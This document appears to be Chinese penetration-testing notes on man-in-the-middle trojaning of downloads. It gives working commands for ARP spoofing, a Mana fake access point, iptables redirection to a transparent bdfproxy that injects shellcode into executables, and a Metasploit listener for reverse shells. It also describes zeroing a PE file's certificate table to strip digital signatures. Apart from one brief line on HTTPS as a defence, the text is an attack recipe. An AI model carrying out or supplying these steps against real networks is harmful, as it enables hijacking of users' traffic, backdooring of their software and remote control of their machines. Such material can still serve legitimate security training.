● 基于流量劫持动态注入shellcode(ARP spoof、DNS spoof、Fake AP)
步骤:
sysctl -w net.ipv4.ip_forward=1 #启动本地路由转发
iptables -t nat -A PREROUTING -p tcp --dport 80/443 -j REDIRECT --to-ports 8080
vim /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent
#修改侦听IP地址并启动bdfproxy
arpspoof -i eth0 -t 1.1.1.2 1.1.1.1
启动Msf
● Mana创建Fack AP
● Bdfproxy代理注入代码
● Msf侦听反弹shell
vi /etc/mana-toolkit/hostapd-mana-conf
#修改无线SSID名称
./usr/share/mana-toolkit/run-mana/start-nat-simple.sh
#修改wlan1无线网卡适配器并启动
iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80/443 -j REDIRECT --to-port 8080
vi /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent
修改侦听IP地址并启动bdfproxy
#启动MSF
Msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
补充
● 全站HTTPS防注入(微软每个补丁都带马)
● PE文件证书签名可被清除
● PE Header -> Optional Header -> Certificate Table(Address and size)
○ 全部用0覆盖
○ BDF默认清除数字签名
https://live.sysinternals.com/